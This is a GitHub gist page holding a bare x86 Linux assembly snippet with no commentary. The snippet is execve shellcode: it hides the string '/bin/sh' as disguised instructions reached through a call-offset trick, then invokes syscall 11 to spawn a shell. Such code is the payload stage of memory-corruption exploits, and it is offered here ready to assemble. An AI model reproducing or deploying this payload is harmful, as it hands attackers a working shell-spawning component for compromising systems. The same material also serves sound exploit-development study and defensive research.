Skip to content

Instantly share code, notes, and snippets.

@hc0d3r
Created February 26, 2017 20:34
Show Gist options
  • Save hc0d3r/d86b6ffbc5a7beffcf2f24e9a30f7394 to your computer and use it in GitHub Desktop.
Save hc0d3r/d86b6ffbc5a7beffcf2f24e9a30f7394 to your computer and use it in GitHub Desktop.
section .text
global _start
_start:
call $+13
das
bound ebp,[ecx+0x6e]
das
dw 0x6873
db 0x00
xor eax, eax
pop ebx
push eax
push ebx
mov ecx, esp
mov al, 11
int 0x80
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment